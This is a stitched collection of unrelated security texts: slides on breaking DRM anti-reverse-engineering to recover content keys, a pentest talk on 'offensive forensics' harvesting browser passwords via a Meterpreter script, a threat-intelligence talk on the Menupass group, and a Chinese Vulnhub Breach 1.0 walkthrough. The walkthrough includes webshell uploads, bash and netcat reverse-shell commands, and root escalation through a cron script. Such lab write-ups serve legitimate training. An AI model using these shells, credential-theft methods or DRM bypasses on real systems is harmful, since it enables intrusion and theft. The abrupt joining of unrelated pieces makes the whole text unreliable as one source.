KiUserExceptionDispatcher: 1 Pass fake context, DR values from internal storage 2 On return copy modifications to real context 3 Apply context via NtContinue Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine KiUserExceptionDispatcher - Re-implemented Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine KiUserExceptionDispatcher - Re-implemented Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine KiUserExceptionDispatcher - Re-implemented Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine KiUserExceptionDispatcher - Re-implemented Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine KiUserExceptionDispatcher - Re-implemented Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Summary Situation after Countermeasures DRM System cannot modify DRs - API hook Exception handler gets expected values - KiUserExceptionDispatcher patch Our debugger can use hardware breakpoints! Implementation available as IDA plugin (IDA Stealth[3]) Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine P-Code Machine Overview Machine Properties Stack based with result register 256 fixed size opcodes (1 byte) Opcodes interleaved with data (ASN.1) Allocate memory in host machine High-level opcodes (load opcodes, call into other modules, music decoding) Low level opcodes, emulate virtual CPU Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Loading of Opcodes Opcode Module Files Special module which contains P-Code machine Contain native code + opcodes Decompressed at runtime No PE, no IAT, no sections, etc. Relocation table + some fixed imports (MSVCRT) Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Obfuscation in the P-Code Machine Executing Opcodes Per-module random pool Randomize opcode <-> opcode handler Descramble opcodes with PRNG in machine Garbage data interleaved with opcodes Data parsed via ASN.1 Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Impact of the P-Code Machine Static RE Difficult Understand machine itself first Different meaning of opcodes per module ASN.1 parsing Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Impact of the P-Code Machine Static RE Difficult Understand machine itself first Different meaning of opcodes per module ASN.1 parsing Debugging Difficult Low signal to noise ratio (big "handler loop") Even lower due to opcode descrambling Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine P-Code Machine in IDA Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Strategies to find Decryption Algorithm + Keysetup 1 Write custom Disassembler (Expensive Strategy) Many handlers Long and complex high level handlers Re-assemble randomization, descrambling, garbage instructions, ASN.1 Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Strategies to find Decryption Algorithm + Keysetup 1 Write custom Disassembler (Expensive Strategy) Many handlers Long and complex high level handlers Re-assemble randomization, descrambling, garbage instructions, ASN.1 2 Trace until key written to memory (Brute Force Strategy) Single-step via debugger script Slow, but reaches code writing key Not so clever Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Strategies to find Decryption Algorithm + Keysetup 1 Write custom Disassembler (Expensive Strategy) Many handlers Long and complex high level handlers Re-assemble randomization, descrambling, garbage instructions, ASN.1 2 Trace until key written to memory (Brute Force Strategy) Single-step via debugger script Slow, but reaches code writing key Not so clever 3 Use emulation (Cool Strategy) Use CPU emulation (PyEmu[4], x86 Emu for IDA[5], ...) Fast, very flexible Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Strategies to find Decryption Algorithm + Keysetup 4 Use BPMs / Attack machine memory (Lazy Strategy) Use what we have Exploit machine memory management Filebuffer size 0x1800, DES keyschedule size 0x80 Set BP, fire when keysetup memory allocated Set BPM, fire when keysetup written Back-trace from there Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Overview Trampolines Debug Registers P-Code Machine Strategies to find Decryption Algorithm + Keysetup 4 Use BPMs / Attack machine memory (Lazy Strategy) Use what we have Exploit machine memory management Filebuffer size 0x1800, DES keyschedule size 0x80 Set BP, fire when keysetup memory allocated Set BPM, fire when keysetup written Back-trace from there Keen Disappointment Decryption and keysetup in native code! High-level handlers! Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Outline 1 Introduction Legal Issues About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Keysetup Algorithm Key Derivation Hash some files Use different hash algorithms Different key for every music file Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Decryption Algorithm Decrypt content with DES-CBC (Cipher Block Chaining) IV from DRM file Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Demo Demo or "Han shot first!" Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Conclusion Summary Overall: good protection BPMs led us to success, P-Code machine almost useless! Implementation weaknesses Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Conclusion Summary Overall: good protection BPMs led us to success, P-Code machine almost useless! Implementation weaknesses Room for Improvements 1 Transform more native code to P-Code 2 Make P-Code machine more complex (nesting, polymorphic handlers, self-modifying machine, ...) 3 Improve (very) weak debugger detection 4 Use DRs, let control flow depend on BPM/BPX firing 5 ... Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Thanks for your Attention! Questions? Contact: jan.newger@newgre.net Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo Electronic Frontier Foundation. Electronic Frontier Foundation. http://www.eff.org/. DMCA. DMCA Encryption Research Paragraph. http://www.law.cornell.edu/uscode/html/ uscode17/usc_sec_17_00001201----000-.html. Jan Newger. IDA Stealth. http://www.newgre.net/idastealth. Cody Pierce. PyEmu: A Multi-Purpose Scriptable x86 Emulator. http://dvlabs.tippingpoint.com/team/cpierce. Chris Eagle. Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content The Algorithm Demo The x86 Emulator plugin for IDAPro. http://www.idabook.com/x86emu/. Jan Newger Anti-RE Techniques in DRM Code
Introductions •  Benjamin Caudill •  Principal Consultant with Rhino Security Labs •  Pentesting, Social Engineering, Webapp •  ~4 Years in Security, 8+ Years in IT •  Aerospace/Defense •  Incident response, forensics (APT-centric) •  Finance Industry •  Webapp assessments •  Consulting •  Pentesting, Social Engineering •  Number of certifications, but who cares? Overview •  Traditional Forensics •  Brief background •  Offensive Forensics •  Introduction/Basics •  Memory •  Potential, Problems •  Disk/Registry •  Potential, Problems •  New Metasploit Module •  Usage •  Quick demo (Traditional) Digital Forensics “…the recovery and investigation of material found in digital devices” •  Related tools and concepts used for investigations (criminal/civil/corporate/etc) •  Objective: Solve a “crime” •  As a result, few ‘forensics’ tools for pentesters Offensive Forensics “The use of forensics techniques for offensive purposes” (Often for improved social engineering, password cracking) •  Why? •  When traditional post-exploit techniques are insufficient for next steps •  Pentesting has a time limit (can’t wait all day keylogging…) •  Objective- Access to additional sensitive information •  Explicit vs Implicit ! Forensic Comparison (Live/Dead Analysis) Offensive Forensics •  Live Analysis – •  Access remotely and can grab memory, but permission prevent access to files •  Hiberfil.sys, page.sys, other OS files, etc… •  Dead Analysis - •  All files accessible (through disk image) •  Loss of potential from user interaction/ live RAM Traditional Forensics •  Live Analysis – •  Can grab memory, but things are changing (scary) •  Legal concerns, chain of custody… •  Dead Analysis – •  System off •  Stable – nothing is changing •  Grab disk image Offensive Forensics - Memory •  Windows Clipboard •  Password Managers – copy/paste •  Command-line History (“doskey /history ”) •  Adding users, FTP/Telnet sessions, etc •  Passwords, Key Files, Encryption Keys (‘process_memdump’ in post MSF modules) •  Password/Key cache (ie: Truecrypt) •  Older software (ie: PuTTY) •  Private Browsing/Sandboxing •  Not quite so private after all… •  (Coming soon!) Volatility plugin to detect Private Browsing Sessions 1.  Browser Files - Watering Hole attacks, Locate intranet sites, Misc Sensitive •  Firefox •  key3.db & signons.sqlite (Passwords) •  places.sqlite (Bookmarks and History) •  Cookies.sqlite (Cookies) •  Formhistory.sqlite (Saved form data) •  Downloads.sqlite (Downloads) •  Content-prefs.sqlite (Site-specific settings, such as local download locations) •  Addons.sqlite (Browser Addons) •  Sessionstore.js (Saved session for when Firefox re-opens) Offensive Forensics - Disk/Registry (1) Browser Form History – Credit Card Info Browser Form History – Account Compromise 2.  Most Recently Used (MRU) - What has the user been looking at? 3.  Prefetch Files – What has the user been running? 4.  Deleted files/Slack Space - What had been on the disk? (‘imager.rb’, ‘recover_files.rb’ in post MSF modules) •  Files are deleted for a reason •  Still underutilized as it takes more time 5.  Backups, Volume Shadow-Copy Service (VSS) (‘vss_list.rb’, related others in post MSF modules) Offensive Forensics - Disk/Registry (2) 6.  Crash dumps – (theoretically) same potential as live memory •  Live systems can’t access page/hiberfil directly, but dumps may be available 7. Calendars, Address book, Smartphone backups, print spools, misc. •  Implicitly Sensitive (spearphishing, watering holes, password cracking, etc.) Offensive Forensics - Disk/Registry (3) • Mo’ Data, Mo’ Problems! •  Thousands of potential files/directories to search •  Not all apply to every OS, application, version, etc. Offensive Forensics - Disk/Registry Offensive Forensics - Disk/Registry •  …And a Meterpreter script was born! •  Forensic_Scraper- Using OS identification, grabs and downloads: •  All Major Browser Files (history, saved passwords, form data, etc) •  Most Recently Used (MRU) list for Windows, MS Office •  Prefetch data (exe’s, time-date stamps) •  Windows Crash Dumps •  Print Spools •  Located Backups (Windows, iPhone, Blackberry, etc) • Much more… Forensic_Scraper – Demo •  Simple – point and shoot Forensic_Scraper – Demo Offensive Forensics - Conclusion Q/A: Find me afterwards ‘Forensic_Scraper’ Download/Demo: RhinoSecurityLabs.com/blog (or from Defcon) Contact: Benjamin.Caudill@RhinoSecurityLabs.com @RhinoSecurity
Catching the Golden Snitch Leveraging Threat Intelligence Platforms to Defend Against Cyber Attacks  ashley@teamt5.org • Malware analysis, malicious document detection, advanced persistence threat research • Tracking several cyber espionage groups for years • Tracking new operations, TTP of APT groups  zha0@teamt5.org • 7+ years experience on Reverse Engineering • 5+ years experience on malware analysis • Sandbox, Exploit research • APT research •  Available Products in each phase  Available TIP Products •  Some takeaways •  What do we fear about cyber threat?  Why do we need Cyber Threat Intelligence? •  Main features of TIP  Aggregation, Analysis, Action •  Story Begins  Pitfalls of Correlation  New activities of Menupass group INTRODUCTION State Secrete (Political, Economic, Defense) National Security Business Intellectual Property Customer Data Personal identifiable Data Privacy • However…… Cyber Espionage Attacks Hacktivism Attacks Cyber Espionage Cyber Crime • Breaches happens everyday • Data leaked everyday.. Personal identifiable Data Privacy • New breaches happens everyday • New indicators disclosed everyday • New vulnerabilities disclosed everyday • About 18 new CVE vulnerabilities disclosed everyday in 2015 • Totally 6419 CVE vulnerabilities disclosed in 2015 • Advanced Persistent Threat • Targeting your Achilles' heel • Knowledge about adversaries and their motivations, intentions, and methods that is collected, analyzed, and disseminated in ways that help security and business staff at all levels protect the critical assets of the enterprise. Jon Friedman et al, 2015, Definitive Guide to Cyber Threat Intelligence Ref: iThome 「關於一銀事件, 看完台灣新聞後, 目前我知道這 起盜領案是由一銀內鬼看色情郵件和用XP Ping ,然後愛用Adidas和愛吃黑嘉麗軟糖的嫌 犯可以把錢拿走,再去宜蘭買捷安特吃白鯧魚, 被捕之後說要上廁所再去看醫生,而且你們有沒 有發現, 安德魯居然有張明星臉!」 • Anunak: APT against financial institutions - Group-IB and Fox-IT • This report describes the details and type of operations carried out by an organized criminal group from Russia that focuses on financial industry. • How to aggregate all the data from different sources? (Open source intelligence, Incident Response, Community, Customers, Exchange Platform) • How to manage all the information for better analysis? • How to analysis these data, co-relate incidents to campaigns? • What is the most significant threat to me? • How to aggregate these cyber threat intelligence with internal data? • How to share and do intelligence exchange? THREAT INTELLIGENCE PLATFORM Threat Intelligence Platform • To support research and tailored threat intelligence program • Simply defined, TIP include three main features: • Aggregating internal & external data: • Data from own surface and external sources • The most important source of relevant threat data of an organization is your own attack surface. • TTP = Tactics, Techniques, and Procedures • Targeted Attack Reconnaissance • Scanbox example • Supporting different input sources: • Samples input • Incident Respond Data • Different Logs? • Intelligence Feed • Indicators input • Spreadsheet? • Structured Language • Structured Threat Information Expression (STIX from MITRE) • Data management • Intelligence requirement – How to answer questions? • BE careful with “Details” • Data Structure, Data Base • Exchange Restriction • Traffic Light Protocol (TLP) • The core feature of TIP • Triaging data priority • Data Prioritization • Customization • Focusing on real threat, generating high-fidelity information • Validation • Analyst assessment • Turning information into actionable intelligence • Timely, Accurate, Relevant • Malware analysis • Static analysis: manual reversing, Yara database, AntiVirus detection • Dynamic: manual tracing and triggering, automated sandboxes • Automate technically processing as much as possible (sandbox, Yara..etc) • Identify code family, C&C servers, languages, possible victim, possible adversary • Exploit analysis • disclosed vulnerabilities, 0 days • Delivery method analysis • Social Engineering • Waterhole attacks • Lateral movement • Correlating C2 infrastructure in different attacks (operation tracking) • Domains, IP co-relations • Known malicious C2 • Compromised machines • Web hosting servers, VPS servers • Passive DNS • WHOIS information analysis • Identify possible targets • Campaign Code • Decoy • Language • Theme • Targeted Data • Identify targeted data • What do actors interested in? • Example: Phishing (Accounts & Password) • Example: Python Downloader from Hangover Team • Identify adversary, actors, origin • Language • Tools • C2 infrastructure • Identify motivations, intentions • Cooperation relationship between different groups • Sharing tools? • Working together in same attacks? • Analyst skills • Technical Skills • Malware Analysis • TTP Analysis • Language • Background, International Relations • Tradecraft, Criminal, Cyberspace • Analytic & Critical Thinking • Discovery ability • “中華航空電子機票” (probably Elirks) • DreamMail, FoxMail Phishing (Probably Taidoor) • Password “flowerdance” (probably Menupass) • Pivoting among data- modelings • Search, Filter, Facet, Cluster • Tag, Comment, Classify, Score • Visualization, Timeline, Maltego • Collaboration • Exchange • Structure Language • STIX and CybOX • Sharing Program • TAXII • Reports • Basic report (Firewalls/IT Staff) • Malwares, Indicators of Compromise (Hashes, C&C) • Advance report • TTP • Adversary • Trend, outlook • Visualization Research Real Case The New Activities of Menupass group • In 2013, we observed an Email sample which were supposedly targeting Japan victim. • Poison Ivy is a public available RAT which has remained popular and effective for about 11 years after its lastest releas. • Special Characteristic of the sample: • Password: keaidestone • ID: 2013/05/15-40 • Finding related samples • ImpHash • Launcher, Dropper • C2 • Specialties of malware samples (Yara Hunting) • OSINT • By now, we have gathered 360+ Samples of this group • More than 800+ indicators of Menupass group • Related OSINT Data: • 2011 Symentec – Inside a Back Door Attack • 2013 FireEye – POISON IVY: Assessing Damage and Extracting Intelligence • 2016 Cylance – Operation Dust Storm • Clustering sample data found that their earliest movement can be dated back to 2007. • We found other tools used by Menupass group by C2 correlation and clustering Yara Rule analysis. • Poison Ivy • PlugX • Gh0st • EvilGrab • SPIVY (New) • Poison Ivy Connection Password: • PlugX Connection Password: • Delivery • Spear-phishing Email with fabricated document file • Attachment file with download link • Decoy document • Tailored content in decoy document • Attachment file of instruction to “exploit” yourself. • 500+ C2 domains & IPs • Favor of Dynamic DNS & Virtual Private Servers. • PubYun • ChangeIP.com • No-IP • FreeDNS • Dyn.com • Oray ( ) Region, Timeframe, Visibility Products Available HP ArcSight ($) IBM QRadar ($) Cisco Source Fire AMP ($) AlienVault (FREE /$) CHT EyeQuila ($) Google Rapid Response (FREE) Mandiant RedLine/MIR (FREE / $) Guidance EnCase Cyber Security ($) Verint XecProbe ($) Carbon Black ($) Falcon Host ($) Mandiant + Fireeye + iSIGHT Partners ($) iDEFENSE ($) Dell SecureWorks ($) CrowdStrike ($) LookingGlass ($) Maltego (FREE / $) DomainTools IRIS ($) ThreatCrowd (FREE) PassiveTotal (FREE / $) FireEye MVX ($) Damballa ($) Lastline ($) ThreatTrack ($) ThreatGRID ($) Cuckoo (FREE) Threat Connect (FREE/ $) MISP (FREE) MITRE CRITS (Free) IBM X-Force ($) EclecticIQ Platform ($) ThreatScap ($) STIX (FREE) TAXII (FREE) CybOX (FREE) TAXII (FREE) Libtaxii TAXII Library (FREE) Yeti TAXII Server (FREE) • Community driven threat intelligence platform • Every instance of ThreatConnect includes access to Public Cloud Common Community. • Provide API, Threat Connect Marketplace • Malware information sharing platform • Storing and sharing Indicators of compromise (IP, domain, hashes) • Open source platform model (available on Github) • Sharing information between MISP instances Conclusion • Cyber Threat Intelligence provides researched and analyzed knowledge about adversaries to help quickly adapt to an ever- changing threat landscape. • The most important source of relevant threat data of an organization is your own attack surface. • Threat Intelligence Platform fusing internal and external sources, facilitating analysis and support your actions. Q&A
目录 Vulnhub渗透测试练习(一)-------------------------------Breach1.0 Vulnhub渗透测试练习(二) ------------------------------Billu_b0x Vulnhub渗透测试练习(三) -------------------------------Bulldog1 Vulnhub渗透测试练习(四)---------------------------------Acid Vulnhub渗透测试练习(五)---------------------------------LazysysAdmin-1 Vulnhub渗透测试练习(六)---------------------------------Freshly Vulnhub渗透测试练习(七)---------------------------------FristiLeaks v1.3 Vulnhub渗透测试练习(八)---------------------------------The Ether Vulnhub渗透测试练习(九)---------------------------------zico2 Vulnhub渗透测试练习(十)---------------------------------Quaoar Vulnhub渗透测试练习(十一)---------------------------------SickOs 1.1 Vulnhub渗透测试练习(十二)---------------------------------BSides-Vancouver-2018- Workshop Vulnhub渗透测试练习(十三)---------------------------------Kioptrix 1 Vulnhub渗透测试练习(十四)----------------------------------Zico2 Vulnhub渗透测试练习(十五)----------------------------------Kioptrix 3 Vulnhub渗透测试练习(十六)----------------------------------Kioptrix 4 Vulnhub靶场题解 - 红日安全团队 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文 件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是 Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:https://www.vulnhub.com 第一节 Breach1.0 靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(,需要将虚拟机网卡设置为host-only方式组网。非常感谢 Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章,特别是通过非预期的方式获取root权 限。 目标 Boot to root:获得root权限,查看flag。 运行环境 靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。 攻击机:同网段下有Windows攻击机(物理机),IP地址:,安装有Nmap、Burpsuit、 Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等渗透工具,也可以使用Kali Linux攻击机。 信息收集 端口服务识别 启动Breach1.0虚拟机,由于IP已知,使用nmap扫描端口,并做服务识别和深度扫描(加-A参数),扫描结果保存 到txt文件,命令: nmap -v -A -oN Breach.txt 发现端口几乎全开放了,显然是有问题,虚拟机对端口扫描做了一些防护措施,直接访问80端口,进入web首 页: 漏洞挖掘 0x01:查看首页源码,解码得到密码 (1) 查看首页源码,发现提示: Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo 这是一串 base64编码。 (2) 将其复制到Burpsuit Decoder进行base64解码,解密后发现还是base64编码,继续base64解码,得到 pgibbons:damnitfeel$goodtobeagang$ta 0x02:登录cms,查看邮件,下载包含SSL证书的密钥库keystore文件 (1) 点击首页的图片,进入 initech.html (2) 点击initech.html左边的 Employee portal 进入到 这是一个 impresscms登录页 使用之前两次base64解码得到的密码登录impresscms: 用户名: pgibbons 密码: damnitfeel$goodtobeagang$ta (3) exploit-db.com查找impress cms漏洞:发现ImpressCMS 1.3.9 SQL注入漏洞: https://www.exploit- db.com/exploits/39737/ ,可注入页面为 /modules/profile/admin/field.php ,但是该页面目前没有权限访问, 无法进行注入。 (4) 注意左边的收件箱Inbox显示有3封邮件,依次打开看: 第1封邮件,主要内容:让你的团队只能向管理门户发布任何敏感的内容。我的密码非常安全,发自ImpressCMS Admin Bill。 第2封邮件,主要内容:Michael采购了IDS/IPS。 第3封邮件,主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore。 (5) 访问 下载包含SSL证书的密钥库keystore文件,keystore是存储公私密钥 的一种文件格式。 0x03:导入流量抓包文件、SSL证书到Wireshark (1) 依次访问左边的菜单树,点击每个菜单栏: content链接了一张图片troll.gif: 点击profile会进入目录浏览: 但都没发现可利用漏洞,继续浏览每个网页。 (2) 点击 View Account 菜单进入界面,再依次点击页面的 Content ,会弹出一行链接 Content SSL implementation test capture ,点击链接,如下图: (3) 进入 页面,可以看到一个 名为: _SSL_test_phase1.pcap 的Wireshark流量包文件,下载它。 同时,该页面有重要的提示信息:这个pCAP文件是有红色团队的重新攻击产生的,但是不能读取文件。而且 They told me the alias, storepassword and keypassword are all set to 'tomcat' 别名、Keystore密码、key密码 都设置成 tomcat 。 由此推测:a.这是一个流量包文件,不能读取很可能因为某些流量有SSL加密(前面的邮件中提供了一个 keystore,这里提供了密码;b.系统中可能存在tomcat。 (4) Windows攻击机安装有JDK,到JDK目录下找到keytool.exe工具:路径 C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe 将keystore放到C盘根目录,查看keystore这个密钥库里面的所有证书,命令 keytool -list -keystore c:\keystore 输入密钥库口令tomcat: (5) 从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令: keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat (6) 将.p12证书导入Wireshark .p12证书存储在C盘根目录,将证书导入Wireshark:在Wireshark中打开 _SSL_test_phase1.pcap 流量包文件,选 择菜单:编辑--首选项--Protocols--SSL,点击右边的Edit: 输入: 8443 http 点击选择证书文件 输入密码tomcat 0x04:从流量包文件中得到tomcat后台URL和密码 (1) 导入证书后,https流量已经被解密,查看每个http流量包: 发现从192.168.110.129到192.168.110.140的攻击流量包,其中有cmd命令马执行了id命令,攻击者上传了两张图 片,疑似图片马,但是命令马无法直接访问,需要登录tomcat后台: (2) 获得Tomcat后台登录地址和用户名密码 继续观察流量包,发现一个Unauthorized的认证包,该request和response包含了Tomcat后台的登录地址: 发现包含登录用户名密码的数据包, 采用http basic认证,认证数据包为: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC 这是base64编码的用户名密码,将 dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC 复制到Burpsuit Decoder进行解码, 得到Tomcat登录用户名密码 Tomcat后台登录用户名:tomcat,密码:Tt\5D8F(#!*u=G)4m7zB 获取shell 0x05: 登录Tomcat后台get shell (1) 登录tomcat后台: (2) Tomcat后台get shell是有标准姿势的,上养马场,准备好jsp版本的各种马,这里有cmd命令小马,菜刀马, jspspy大马,将其打成caidao.zip压缩包,再将zip压缩包将扩展名改为caidao.war,将war包上传部署即可: (2) 在WAR file to deploy中将war包上传: 上传后在目录中找到上传的目录/caidao,已上传jsp木马文件就在这个目录下。 (3) 使用中国菜刀连接 (4) 使用菜刀命令行连接,执行id;pwd命令成功: (5) 发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可 能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来。 提升权限 0x06: 查看系统用户,发现mysql root密码 (1) 查看当前系统用户,找id为1000以后的用户 cat /etc/passwd 发现两个值得关注的用户:milton 和 blumbergh (2) 在菜刀里面找到网页根目录,默认是在tomcat目录,找到网页部署目录 /var/www/5446/ (3) 该目录下发现两个奇怪的php文件,命名非常长且无规律fe4db1f7bc038d60776dcb66ab3404d5.php和 0d93f85c5061c44cdffeb8381b2772fd.php,使用菜刀下载下来打开查看: 这是mysql数据库连接文件,使用mysql的root账号连接数据库,密码为空。 (4) 因为菜刀马总是被删除,所以反弹shell到nc:在菜刀cmd命令行反弹一个shell到Windows攻击机的nc,命 令: echo "bash -i >& /dev/tcp/ 0>&1" | bash nc接收反弹sehll成功: (5) 连接mysql数据库,查看mysql用户,这里输入mysql命令后一直没有回显,直到输入exit退出mysql登录后,查 询回显才出来,命令: mysql -u root -p use mysql; select user,password from user; exit 得到milton用户的密码哈希: 6450d89bd3aff1d893b85d3ad65d2ec2 到 https://www.somd5.com/ 解密,得到用户milton的明文密码:thelaststraw 0x07: 提权到用户milton和blumbergh (1) 无法执行su命令,显示需要一个终端,之前都遇到这个问题,通过Python解决: python -c 'import pty;pty.spawn("/bin/bash")' (2) 提权到用户milton su - milton 密码:thelaststraw 查看milton用户home目录下的some_script.sh文件,没有可利用的信息。 (3) 查看系统内核版本,命令 uanme -a 和 cat /etc/issue 系统内核版本为:Linux Breach 4.2.0-27-generic,不存在Ubuntu本地提权漏洞。存在本地提权漏洞内核版本 是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) (4) 查看历史命令,无有价值的线索,看到历史命令su提权到了blumbergh用户。需要找到blumbergh用户的密 码。 (5) 到现在发现了7张图片,6张在图片目录: ,1张在milton用户目录下: milton用户目录下my_badge.jpg 将图片复制到kali linux,使用strings打印各图片其中的可打印字符,追加输出到images.txt,在vim下查看,密码 在bill.png图片中。 找到可能的密码或提示: 发现唯一的单词是: coffeestains 或者使用exiftool.exe工具查看bill.png图片的exif信息,得到可能的密码: coffeestains (6)提权到blumbergh用户 用户名:blumbergh 密码:coffeestains (7)查看历史命令,发现/usr/share/cleanup和tidyup.sh脚本文件: 读取tidyup.sh脚本分析: cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf 这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删 除,需要重新上传。 查看tidyup.sh的权限,对该脚本没有写入权限,只有root可以 查看sudo权限,执行sudo -l: 发现用户能够以root权限执行这tee程序或tidyup.sh脚本:/usr/bin/tee和/usr/share/cleanup/tidyup.sh tee命令用于读取标准输入的数据,并将其内容输出成文件。tidyup.sh是清理脚本。 0x07:反弹root权限shell,获取flag (1) 向tidyup.sh中写入反弹shell命令 tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写 入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令: echo "nc -e /bin/bash 5555" > shell.txt 再使用tee命令将shell.txt内容输出到tidyup.sh cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh 查看tidyup.sh文件写入成功: cat /usr/share/cleanup/tidyup.sh (2) nc监听等待反弹shell,查看权限是root,flag是一张图片,将图片拷贝到home目录: (3) 查看一下crontab计划任务,发现果然有每3分钟执行tidyup.sh清理脚本的任务: (4) 使用之前上传的jsp大马JspSpy将flair.jpg下载到Windows: (5) 查看flag: I NEED TO TALK ABOUT YOUR FLAIR 游戏通关。 思路总结 主要突破点 (1) 从网页源码和图片字符中解密出CMS和Tomcat的账号、密码。 (2) 导入ssl证书到Wireshark中解密经过SSL加密的流量,获得Tomcat后台登录URL和账号密码。 (3) Tomcat后台get shell姿势要熟练。 (4) 提权:找到两个账号的密码,发现可以root权限执行的tee命令和tidyup.sh清理脚本,通过计划任务反弹root shell。 难点和踩到的坑 (1) 使用keytool导出SSL证书:这是非常规渗透知识,需要查阅原理和工具使用,耗费时间较多。 (2) Tomcat后台get shell后,已上传的菜刀马总是被杀,每次传上去过不了几分钟没了,当时以为该系统安装了杀 毒软件或web shell清理工具,实际是因为主机tidyup.sh清理脚本,每3分钟清理一次。反弹出一个shell就可以持 续使用shell了。 (3) 连接mysql执行命令,没有回显。菜刀执行命令超时,nc中只有exit退出时才回显,当时打算放弃了,才exit退 出,结果退出才有回显,发现了milton账号的密码哈希。山重水复疑无路,柳暗花明又一村。 (4) 花费较多时间进行两次账号切换,再反弹root shell提权。发现和利用tidyup.sh需要较多时间。 (5) 通过crontab的计划任务,反弹root shell的方式,在真实渗透测试中是常见的,比如redis的root空口令挖矿,可 以ssh证书连接,也可以写root crontab反弹,但是在Vulnhub中第一次遇到,对初学者有难度。 第二节 Billu_b0x 靶机信息 下载链接 https://download.vulnhub.com/billu/Billu_b0x.zip 靶机说明 虚拟机难度中等,使用ubuntu(32位),其他软件包有: PHP apache MySQL 目标 Boot to root:从Web应用程序进入虚拟机,并获得root权限。 运行环境 靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。 